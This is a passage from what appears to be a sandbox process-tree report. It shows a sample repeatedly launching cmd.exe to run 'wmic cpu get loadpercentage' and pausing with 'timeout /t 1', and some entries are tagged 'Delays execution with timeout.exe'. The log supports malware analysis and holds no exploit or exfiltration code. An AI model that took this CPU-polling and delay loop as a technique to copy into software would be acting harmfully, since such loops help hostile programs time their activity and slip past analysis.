    PID:4164
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3224
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4348
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3120
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1568
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1972
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3244
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1172
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1740
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2572
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2440
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:228
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4988
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3980
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5116
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:912
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1996
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2168
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2260
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4828
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1332
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3180
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1948
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3484
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3976
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:412
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2820
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4656
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4456
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3020
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4880
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3248
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:848
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4204
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4584
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2132
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1656
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4640
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:996
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4752
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:516
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4660
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1968
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3204
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1528
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4492
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4532
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1060
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4636
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4516
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3772
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3944
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1544
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2188
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:672
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4720
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4520
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3348
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3948
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1412
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:772
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3716
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2884
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:116
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2904
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1424
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1692
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3896
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3544
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4612
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4832
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2740
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2412
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2664
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1068
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2820
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:452
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2420
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4332
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2124
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2252
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:740
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2992
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:212
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4960
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:988
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4440
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2076
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2988
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2264
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:180
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1512
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4956
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:876
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3048
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1472
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2628
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2784
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4480
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2916
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1440
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:908
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3176
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2620
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4092
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3464
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3740
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4000
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1664
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4376
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3348
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1412
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3568
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:772
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4212
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2884
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3832
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:116
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3964
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4472
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3252
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:620
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5116
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1692
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3996
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:396
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3812
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2260
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1616
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:736
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1948
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1600
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3756
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:60
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4224
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2948
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1444
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3712
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1104
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4684
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4712
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3248
  - - C:\Windows\System32\Wbem\WMIC.exe
